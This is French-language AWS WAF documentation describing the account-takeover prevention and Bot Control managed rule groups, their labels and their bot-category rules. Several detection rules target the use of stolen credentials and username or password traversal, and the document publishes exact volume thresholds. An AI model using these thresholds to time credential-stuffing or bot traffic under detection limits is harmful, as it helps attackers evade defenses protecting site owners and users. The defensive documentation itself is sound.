Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| UnsupportedCognitoIDP | Vérifie le trafic Web destiné à un groupe d'utilisateurs Amazon Cognito. ATP n'est pas disponible pour une utilisation avec les groupes d'utilisateurs Amazon Cognito, et cette règle permet de garantir que les autres règles des groupes de règles ATP ne sont pas utilisées pour évaluer le trafic des groupes d'utilisateurs. Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:unsupported:cognito_idp` et `awswaf:managed:aws:atp:UnsupportedCognitoIDP`   | 
| VolumetricIpHigh | Détecte les volumes élevés de demandes envoyées à partir d'adresses IP individuelles. Un volume élevé correspond à plus de 20 demandes dans une fenêtre de 10 minutes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. En cas de volume élevé, quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:volumetric:ip:high` et `awswaf:managed:aws:atp:VolumetricIpHigh`  Le groupe de règles applique les libellés suivants aux demandes présentant un volume moyen (plus de 15 demandes par fenêtre de 10 minutes) et un volume faible (plus de 10 demandes par fenêtre de 10 minutes), mais ne prend aucune mesure à leur égard : `awswaf:managed:aws:atp:aggregate:volumetric:ip:medium` et`awswaf:managed:aws:atp:aggregate:volumetric:ip:low`. | 
| VolumetricSession |  Inspecte les volumes élevés de demandes envoyées lors de sessions client individuelles. Le seuil est supérieur à 20 demandes par fenêtre de 30 minutes.  Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).  Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:volumetric:session` et `awswaf:managed:aws:atp:VolumetricSession`   | 
| AttributeCompromisedCredentials |  Vérifie la présence de plusieurs demandes provenant de la même session client qui utilisent des informations d'identification volées.  Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:attribute:compromised_credentials` et `awswaf:managed:aws:atp:AttributeCompromisedCredentials`   | 
| AttributeUsernameTraversal |  Vérifie la présence de plusieurs demandes provenant de la même session client qui utilisent le changement de nom d'utilisateur.  Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:attribute:username_traversal` et `awswaf:managed:aws:atp:AttributeUsernameTraversal`   | 
| AttributePasswordTraversal |  Vérifie la présence de plusieurs demandes utilisant le même nom d'utilisateur et utilisant la traversée de mots de passe.  Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:attribute:password_traversal` et `awswaf:managed:aws:atp:AttributePasswordTraversal`   | 
| AttributeLongSession |  Vérifie la présence de plusieurs demandes provenant de la même session client qui utilisent des sessions de longue durée. Le seuil est de plus de 6 heures de trafic faisant l'objet d'au moins une demande de connexion toutes les 30 minutes. Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:attribute:long_session` et `awswaf:managed:aws:atp:AttributeLongSession`   | 
| TokenRejected |  Inspecte les demandes contenant des jetons rejetées par la gestion des AWS WAF jetons.  Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle Block Étiquettes : Aucune. Pour vérifier si un jeton a été rejeté, utilisez une règle de correspondance d'étiquette correspondant à l'étiquette :`awswaf:managed:token:rejected`.   | 
| SignalMissingCredential |  Vérifie les demandes dont les informations d'identification ne contiennent pas le nom d'utilisateur ou le mot de passe.  Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:signal:missing_credential` et `awswaf:managed:aws:atp:SignalMissingCredential`   | 
| VolumetricIpFailedLoginResponseHigh |  Recherche les adresses IP qui ont récemment été à l'origine d'un taux trop élevé de tentatives de connexion infructueuses. Un volume élevé correspond à plus de 10 demandes de connexion échouées provenant d'une adresse IP dans une fenêtre de 10 minutes.  Si vous avez configuré le groupe de règles pour inspecter le corps de la réponse ou les composants JSON, vous AWS WAF pouvez inspecter les 65 536 premiers octets (64 Ko) de ces types de composants pour détecter des indicateurs de réussite ou d'échec.  Cette règle applique l'action et l'étiquetage des règles aux nouvelles requêtes Web provenant d'une adresse IP, en fonction des réponses de réussite et d'échec de la ressource protégée aux récentes tentatives de connexion à partir de la même adresse IP. Vous définissez comment comptabiliser les réussites et les échecs lorsque vous configurez le groupe de règles.   AWS WAF évalue cette règle uniquement dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Il est possible que le client envoie plus de tentatives de connexion infructueuses que ce qui est autorisé avant que la règle ne commence à correspondre lors des tentatives suivantes.   Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:volumetric:ip:failed_login_response:high` et `awswaf:managed:aws:atp:VolumetricIpFailedLoginResponseHigh`  Le groupe de règles applique également les libellés associés suivants aux demandes, sans aucune action associée. Tous les chiffres sont basés sur une fenêtre de 10 minutes. `awswaf:managed:aws:atp:aggregate:volumetric:ip:failed_login_response:medium`pour plus de 5 demandes ayant échoué, `awswaf:managed:aws:atp:aggregate:volumetric:ip:failed_login_response:low` pour plus d'une demande échouée, `awswaf:managed:aws:atp:aggregate:volumetric:ip:successful_login_response:high` pour plus de 10 demandes réussies, `awswaf:managed:aws:atp:aggregate:volumetric:ip:successful_login_response:medium` pour plus de 5 demandes réussies et `awswaf:managed:aws:atp:aggregate:volumetric:ip:successful_login_response:low` pour plus d'une demande réussie.   | 
| VolumetricSessionFailedLoginResponseHigh |  Vérifie les sessions client qui ont récemment été à l'origine d'un taux trop élevé de tentatives de connexion infructueuses. Un volume élevé correspond à plus de 10 demandes de connexion échouées depuis une session client sur une période de 30 minutes.  Si vous avez configuré le groupe de règles pour inspecter le corps de la réponse ou les composants JSON, vous AWS WAF pouvez inspecter les 65 536 premiers octets (64 Ko) de ces types de composants pour détecter des indicateurs de réussite ou d'échec.  Cette règle applique l'action et l'étiquetage des règles aux nouvelles requêtes Web provenant d'une session client, en fonction des réponses de réussite et d'échec de la ressource protégée aux récentes tentatives de connexion effectuées au cours de la même session client. Vous définissez comment comptabiliser les réussites et les échecs lorsque vous configurez le groupe de règles.   AWS WAF évalue cette règle uniquement dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Il est possible que le client envoie plus de tentatives de connexion infructueuses que ce qui est autorisé avant que la règle ne commence à correspondre lors des tentatives suivantes.   Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle Block Étiquettes : `awswaf:managed:aws:atp:aggregate:volumetric:session:failed_login_response:high` et `awswaf:managed:aws:atp:VolumetricSessionFailedLoginResponseHigh`  Le groupe de règles applique également les libellés associés suivants aux demandes, sans aucune action associée. Tous les comptes sont basés sur une fenêtre de 30 minutes. `awswaf:managed:aws:atp:aggregate:volumetric:session:failed_login_response:medium`pour plus de 5 demandes ayant échoué, `awswaf:managed:aws:atp:aggregate:volumetric:session:failed_login_response:low` pour plus d'une demande échouée, `awswaf:managed:aws:atp:aggregate:volumetric:session:successful_login_response:high` pour plus de 10 demandes réussies, `awswaf:managed:aws:atp:aggregate:volumetric:session:successful_login_response:medium` pour plus de 5 demandes réussies et `awswaf:managed:aws:atp:aggregate:volumetric:session:successful_login_response:low` pour plus d'une demande réussie.   | 

# AWS WAF Groupe de règles Bot Control
<a name="aws-managed-rule-groups-bot"></a>

Cette section explique ce que fait le groupe de règles géré par Bot Control.

VendorName:`AWS`, Nom :`AWSManagedRulesBotControlRuleSet`, WCU : 50

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin d'une nouvelle classification de bots pour Bot Control ou si vous avez besoin d'informations supplémentaires qui ne sont pas abordées ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/).

Le groupe de règles gérées par Bot Control fournit des règles qui gèrent les demandes des robots. Les robots peuvent consommer des ressources excédentaires, fausser les indicateurs commerciaux, provoquer des interruptions de service et mener des activités malveillantes. 

## Niveaux de protection
<a name="aws-managed-rule-groups-bot-prot-levels"></a>

Le groupe de règles gérées par Bot Control fournit deux niveaux de protection parmi lesquels vous pouvez choisir : 
+ **Fréquent** : détecte une variété de robots auto-identifiables, tels que les frameworks de scraping Web, les moteurs de recherche et les navigateurs automatisés. Les protections Bot Control à ce niveau identifient les robots courants à l'aide de techniques de détection de bots traditionnelles, telles que l'analyse statique des données des demandes. Les règles étiquettent le trafic provenant de ces robots et bloquent ceux qu'ils ne peuvent pas vérifier. 
+ **Ciblé** : inclut les protections de niveau commun et ajoute une détection ciblée pour les robots sophistiqués qui ne s'identifient pas eux-mêmes. Des protections ciblées atténuent l'activité des robots en combinant la limitation du débit, le CAPTCHA et les défis liés au navigateur en arrière-plan. 
  + **`TGT_`**— Les règles qui fournissent une protection ciblée portent des noms commençant par`TGT_`. Toutes les protections ciblées utilisent des techniques de détection telles que l'interrogation du navigateur, la prise d'empreintes digitales et l'heuristique comportementale pour identifier le trafic de bots défectueux. 
  + **`TGT_ML_`**— Les règles de protection ciblées qui utilisent l'apprentissage automatique portent des noms commençant par`TGT_ML_`. Ces règles utilisent une analyse automatisée par apprentissage automatique des statistiques de trafic du site Web pour détecter les comportements anormaux indiquant une activité distribuée et coordonnée des bots. AWS WAF analyse les statistiques relatives au trafic de votre site Web, telles que les horodatages, les caractéristiques du navigateur et les URL précédemment visitées, afin d'améliorer le modèle d'apprentissage automatique de Bot Control. Les fonctionnalités d'apprentissage automatique sont activées par défaut, mais vous pouvez les désactiver dans la configuration de votre groupe de règles. Lorsque l'apprentissage automatique est désactivé, AWS WAF n'évalue pas ces règles. 

Le niveau de protection ciblé et l'énoncé de règle AWS WAF basé sur le taux permettent tous deux de limiter le débit. Pour une comparaison des deux options, voir[Options de limitation du débit dans les règles basées sur les taux et dans les règles de contrôle des bots ciblées](waf-rate-limiting-options.md).

## Considérations relatives à l'utilisation de ce groupe de règles
<a name="aws-managed-rule-groups-bot-using"></a>

Ce groupe de règles fait partie des protections intelligentes d'atténuation des menaces contenues dans AWS WAF. Pour plus d'informations, consultez [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md).

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Pour réduire vos coûts et être sûr de gérer votre trafic Web comme vous le souhaitez, utilisez ce groupe de règles conformément aux instructions de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md).

Nous mettons régulièrement à jour nos modèles d'apprentissage automatique (ML) pour les règles basées sur le niveau de protection ciblé, afin d'améliorer les prévisions des robots. Les règles basées sur le ML ont des noms commençant par. `TGT_ML_` Si vous remarquez un changement soudain et substantiel dans les prédictions des robots établies par ces règles, contactez-nous par l'intermédiaire de votre responsable de compte ou ouvrez un dossier auprès [AWS Support du Center](https://console.aws.amazon.com/support/home#/). 

## Étiquettes ajoutées par ce groupe de règles
<a name="aws-managed-rule-groups-bot-labels"></a>

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 

### Étiquettes à jetons
<a name="aws-managed-rule-groups-bot-labels-token"></a>

Ce groupe de règles utilise la gestion des AWS WAF jetons pour inspecter et étiqueter les requêtes Web en fonction de l'état de leurs AWS WAF jetons. AWS WAF utilise des jetons pour le suivi et la vérification des sessions client. 

Pour plus d'informations sur les jetons et leur gestion, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).

Pour plus d'informations sur les composants de l'étiquette décrits ici, voir[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md).

**Libellé de session client**  
L'étiquette `awswaf:managed:token:id:identifier` contient un identifiant unique que la gestion des AWS WAF jetons utilise pour identifier la session client. L'identifiant peut changer si le client acquiert un nouveau jeton, par exemple après avoir supprimé le jeton qu'il utilisait. 

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquette d'empreinte digitale du navigateur**  
L'étiquette `awswaf:managed:token:fingerprint:fingerprint-identifier` contient un identifiant d'empreinte digitale robuste que la gestion des AWS WAF jetons calcule à partir de divers signaux du navigateur client. Cet identifiant reste le même lors de plusieurs tentatives d'acquisition de jetons. L'identifiant d'empreinte digitale n'est pas propre à un seul client.

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquettes d'état des jetons : préfixes d'espace de noms d'étiquettes**  
Les étiquettes d'état du jeton indiquent le statut du jeton et les informations de défi et de CAPTCHA qu'il contient. 

Chaque étiquette de statut de jeton commence par l'un des préfixes d'espace de noms suivants : 
+ `awswaf:managed:token:`— Utilisé pour signaler l'état général du jeton et pour rendre compte de l'état des informations de défi du jeton. 
+ `awswaf:managed:captcha:`— Utilisé pour rendre compte de l'état des informations CAPTCHA du jeton. 

**Étiquettes d'état des jetons : noms des étiquettes**  
Après le préfixe, le reste de l'étiquette fournit des informations détaillées sur l'état du jeton : 
+ `accepted`— Le jeton de demande est présent et contient les éléments suivants : 
  + Un défi ou une solution CAPTCHA valide.
  + Un défi ou un horodatage CAPTCHA non expiré.
  + Spécification de domaine valide pour le pack de protection (ACL Web). 

  Exemple : L'étiquette `awswaf:managed:token:accepted` indique que le jeton des requêtes Web contient une solution de défi valide, un horodatage de défi non expiré et un domaine valide.
+ `rejected`— Le jeton de demande est présent mais ne répond pas aux critères d'acceptation. 

  Outre l'étiquette rejetée, la gestion des jetons ajoute un espace de noms et un nom d'étiquette personnalisés pour en indiquer la raison. 
  + `rejected:not_solved`— Le challenge ou la solution CAPTCHA ne sont pas présents dans le jeton. 
  + `rejected:expired`— L'horodatage du challenge ou du CAPTCHA du jeton a expiré, conformément aux durées d'immunité des jetons configurées par votre pack de protection (ACL Web). 
  + `rejected:domain_mismatch`— Le domaine du jeton ne correspond pas à la configuration du domaine du jeton de votre pack de protection (ACL Web). 
  + `rejected:invalid`— AWS WAF n'a pas pu lire le jeton indiqué. 

  Exemple : `awswaf:managed:captcha:rejected:expired` ensemble, les `awswaf:managed:captcha:rejected` libellés indiquent que la demande ne comportait pas de résolution CAPTCHA valide car l'horodatage CAPTCHA figurant dans le jeton a dépassé le délai d'immunité du jeton CAPTCHA configuré dans le pack de protection (ACL Web).
+ `absent`— La demande ne contient pas le jeton ou le gestionnaire de jetons n'a pas pu le lire. 

  Exemple : L'étiquette `awswaf:managed:captcha:absent` indique que la demande ne contient pas le jeton. 

### Étiquettes Bot Control
<a name="aws-managed-rule-groups-bot-labels-rg"></a>

Le groupe de règles géré par Bot Control génère des étiquettes avec le préfixe d'espace de noms `awswaf:managed:aws:bot-control:` suivi de l'espace de noms personnalisé et du nom de l'étiquette. Le groupe de règles peut ajouter plusieurs libellés à une demande. 

Chaque étiquette reflète les conclusions de la règle Bot Control : 
+ `awswaf:managed:aws:bot-control:bot:`— Informations sur le bot associé à la demande. 
  + `awswaf:managed:aws:bot-control:bot:name:<name>`— Le nom du bot, s'il est disponible, par exemple, les espaces de noms personnalisés `bot:name:slurp``bot:name:googlebot`, et`bot:name:pocket_parser`. 
  + `awswaf:managed:aws:bot-control:bot:name:<rfc_name>`— Identifie le bot spécifique à l'aide du jeton de produit RFC issu de la signature WBA. Ceci est utilisé pour créer des règles personnalisées granulaires pour des robots spécifiques. Par exemple, autorisez les autres robots d'exploration, `GoogleBot` mais limitez leur débit. 
  + `awswaf:managed:aws:bot-control:bot:category:<category>`— La catégorie du bot, telle que définie par AWS WAF, par exemple, `bot:category:search_engine` et`bot:category:content_fetcher`. 
  + `awswaf:managed:aws:bot-control:bot:account:<hash>`—Pour les robots utilisant Amazon Bedrock Agent Core uniquement. Cette étiquette contient un hachage opaque identifiant de manière unique le AWS compte propriétaire de l'agent. Utilisez cette étiquette pour créer des règles personnalisées qui autorisent, bloquent ou limitent le débit des robots provenant de AWS comptes spécifiques sans que le compte soit affiché IDs dans les journaux.
  + `awswaf:managed:aws:bot-control:bot:web_bot_auth:<status>`— Appliqué lorsque la validation de l'authentification par bot Web (WBA) est effectuée sur une demande. Le suffixe d'état indique le résultat de la vérification :
    + `web_bot_auth:verified`— Signature validée avec succès par rapport au répertoire des clés publiques
    + `web_bot_auth:invalid`— Signature présente mais échec de la validation cryptographique
    + `web_bot_auth:expired`— La signature a utilisé une clé cryptographique expirée
    + `web_bot_auth:unknown_bot`— Identifiant de clé introuvable dans le répertoire des clés
**Note**  
Lorsque l'`web_bot_auth:verified`étiquette est présente, les `TGT_TokenAbsent` règles `CategoryAI` et ne correspondent pas, ce qui permet aux hôtes WBA vérifiés de continuer.
  + `awswaf:managed:aws:bot-control:bot:organization:<organization>`— L'éditeur du bot, par exemple,`bot:organization:google`. 
  + `awswaf:managed:aws:bot-control:bot:verified`— Utilisé pour indiquer un bot qui s'identifie et que Bot Control a pu vérifier. Ceci est utilisé pour les robots les plus courants et peut être utile lorsqu'il est combiné avec des étiquettes de catégorie `bot:category:search_engine` ou des étiquettes de nom telles que`bot:name:googlebot`. 
**Note**  
Bot Control utilise l'adresse IP de l'origine de la requête Web pour déterminer si un bot est vérifié. Vous ne pouvez pas le configurer pour utiliser la configuration IP AWS WAF transférée, pour inspecter une autre source d'adresses IP. Si vous avez vérifié que des robots sont acheminés via un proxy ou un équilibreur de charge, vous pouvez ajouter une règle qui s'exécute avant le groupe de règles Bot Control pour vous aider. Configurez votre nouvelle règle pour utiliser l'adresse IP transférée et autoriser explicitement les demandes provenant des robots vérifiés. Pour plus d'informations sur l'utilisation des adresses IP transférées, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md).
  + `awswaf:managed:aws:bot-control:bot:vendor:<vendor_name>`— Identifie le fournisseur ou l'opérateur d'un bot vérifié. Actuellement disponible uniquement pour Agentcore. À utiliser pour créer des règles personnalisées qui autorisent ou bloquent des fournisseurs de robots spécifiques, quels que soient les noms de robots individuels.
  + `awswaf:managed:aws:bot-control:bot:user_triggered:verified`— Utilisé pour indiquer un bot similaire à un bot vérifié, mais qui peut être directement invoqué par les utilisateurs finaux. Cette catégorie de bot est traitée par les règles du Bot Control comme un bot non vérifié. 
  + `awswaf:managed:aws:bot-control:bot:developer_platform:verified`— Utilisé pour indiquer un bot similaire à un bot vérifié, mais utilisé par les plateformes de développement pour la création de scripts, par exemple Google Apps Script. Cette catégorie de bot est traitée par les règles du Bot Control comme un bot non vérifié. 
  + `awswaf:managed:aws:bot-control:bot:unverified`— Utilisé pour indiquer un bot qui s'identifie, afin qu'il puisse être nommé et classé, mais qui ne publie pas d'informations pouvant être utilisées pour vérifier son identité de manière indépendante. Ces types de signatures de robots peuvent être falsifiés et sont donc considérés comme non vérifiés. 
+ `awswaf:managed:aws:bot-control:targeted:<additional-details> `— Utilisé pour les étiquettes spécifiques aux protections ciblées Bot Control. 
+ `awswaf:managed:aws:bot-control:signal:<signal-details>`et `awswaf:managed:aws:bot-control:targeted:signal:<signal-details> ` — Utilisé pour fournir des informations supplémentaires sur la demande dans certaines situations. 

  Vous trouverez ci-dessous des exemples d'étiquettes de signal. Cette liste n'est pas exhaustive :
  + `awswaf:managed:aws:bot-control:signal:cloud_service_provider:<CSP>`— Indique un fournisseur de services cloud (CSP) pour la demande. Cela CSPs inclut `aws` l'infrastructure Amazon Web Services, `gcp` l'infrastructure Google Cloud Platform (GCP), `azure` les services cloud Microsoft Azure et `oracle` les services Oracle Cloud. 
  + `awswaf:managed:aws:bot-control:targeted:signal:browser_automation_extension`— Indique la détection d'une extension de navigateur qui facilite l'automatisation, telle que Selenium IDE. 

    Cette étiquette est ajoutée chaque fois qu'un utilisateur a installé ce type d'extension, même s'il ne l'utilise pas activement. Si vous implémentez une règle de correspondance des libellés à cet effet, soyez conscient de la possibilité de faux positifs dans la logique de la règle et dans les paramètres d'action. Par exemple, vous pouvez utiliser une CAPTCHA action à la place de Block ou vous pouvez combiner cette correspondance d'étiquette avec d'autres correspondances d'étiquettes, afin de vous assurer que l'automatisation est utilisée.
  + `awswaf:managed:aws:bot-control:signal:automated_browser`— Indique que la demande contient des indicateurs indiquant que le navigateur client est peut-être automatisé.
  + `awswaf:managed:aws:bot-control:targeted:signal:automated_browser`— Indique que le AWS WAF jeton de la demande contient des indicateurs indiquant que le navigateur client est peut-être automatisé.

Vous pouvez récupérer toutes les étiquettes d'un groupe de règles via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la `AvailableLabels` propriété de la réponse. 

Le groupe de règles géré par Bot Control applique des étiquettes à un ensemble de robots vérifiables généralement autorisés. Le groupe de règles ne bloque pas ces robots vérifiés. Si vous le souhaitez, vous pouvez les bloquer, ou un sous-ensemble d'entre eux, en écrivant une règle personnalisée qui utilise les étiquettes appliquées par le groupe de règles géré par Bot Control. Pour plus d'informations à ce sujet et pour des exemples, consultez[AWS WAF Contrôle des robots](waf-bot-control.md).

## Liste des règles de contrôle des bots
<a name="aws-managed-rule-groups-bot-rules"></a>

Cette section répertorie les règles de contrôle des robots.

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin d'une nouvelle classification de bots pour Bot Control ou si vous avez besoin d'informations supplémentaires qui ne sont pas abordées ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/).


| Nom de la règle | Description | 
| --- | --- | 
| CategoryAdvertising |  Inspecte les robots utilisés à des fins publicitaires. Par exemple, vous pouvez utiliser des services publicitaires tiers qui doivent accéder par programmation à votre site Web.  Action de règle, appliquée uniquement aux robots non vérifiés : Block Étiquettes : `awswaf:managed:aws:bot-control:bot:category:advertising` et `awswaf:managed:aws:bot-control:CategoryAdvertising`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryArchiver |  Inspecte les robots utilisés à des fins d'archivage. Ces robots explorent le Web et capturent du contenu dans le but de créer des archives. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:archiver` et `awswaf:managed:aws:bot-control:CategoryArchiver`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryContentFetcher |  Détecte les robots qui visitent le site Web de l'application pour le compte d'un utilisateur, pour récupérer du contenu tel que des flux RSS ou pour vérifier ou valider votre contenu.  Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:content_fetcher` et `awswaf:managed:aws:bot-control:CategoryContentFetcher`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryEmailClient |  Détecte les robots qui vérifient les liens contenus dans les e-mails pointant vers le site Web de l'application. Cela peut inclure des robots gérés par des entreprises et des fournisseurs de messagerie, pour vérifier les liens contenus dans les e-mails et signaler les e-mails suspects. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:email_client` et `awswaf:managed:aws:bot-control:CategoryEmailClient`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryHttpLibrary |  Inspecte les requêtes générées par des robots à partir des bibliothèques HTTP de différents langages de programmation. Il peut s'agir de demandes d'API que vous choisissez d'autoriser ou de surveiller. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:http_library` et `awswaf:managed:aws:bot-control:CategoryHttpLibrary`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryLinkChecker |  Détecte les robots qui vérifient la présence de liens rompus.  Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:link_checker` et `awswaf:managed:aws:bot-control:CategoryLinkChecker`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryMiscellaneous |  Inspecte les robots divers qui ne correspondent pas aux autres catégories.  Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:miscellaneous` et `awswaf:managed:aws:bot-control:CategoryMiscellaneous`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryMonitoring |  Inspecte les robots utilisés à des fins de surveillance. Par exemple, vous pouvez utiliser des services de surveillance de bots qui envoient régulièrement des requêtes ping au site Web de votre application pour surveiller des éléments tels que les performances et le temps de disponibilité. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:monitoring` et `awswaf:managed:aws:bot-control:CategoryMonitoring`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryPagePreview |  Détecte les robots qui génèrent des aperçus de pages et des aperçus de liens lorsque du contenu est partagé sur des plateformes de messagerie, des réseaux sociaux ou des outils de collaboration. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:page_preview` et `awswaf:managed:aws:bot-control:CategoryPagePreview`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
